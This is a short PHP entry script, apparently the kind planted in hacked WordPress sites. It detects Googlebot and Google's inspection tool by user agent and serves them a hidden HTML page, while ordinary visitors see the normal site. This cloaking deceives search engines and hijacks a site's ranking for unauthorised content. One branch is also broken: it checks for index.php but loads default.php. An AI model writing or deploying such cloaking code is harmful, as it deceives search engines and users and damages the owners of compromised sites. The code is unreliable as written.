<?php
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$is_googlebot = preg_match('/Googlebot|Google-InspectionTool/i', $user_agent);

$cloak_file = __DIR__ . '/availability/index.html';

if ($is_googlebot && file_exists($cloak_file)) {
    header('Content-Type: text/html');
    readfile($cloak_file);
    exit;
}

if (file_exists(__DIR__ . '/default.php')) {

    require __DIR__ . '/default.php';
} elseif (file_exists(__DIR__ . '/wp-blog-header.php')) {

    define('WP_USE_THEMES', true);
    require __DIR__ . '/wp-blog-header.php';
} elseif (file_exists(__DIR__ . '/index.php')) {

    require __DIR__ . '/default.php';
} else {

    echo "Website aktif namun tidak bisa menemukan engine utama.";
}
?>
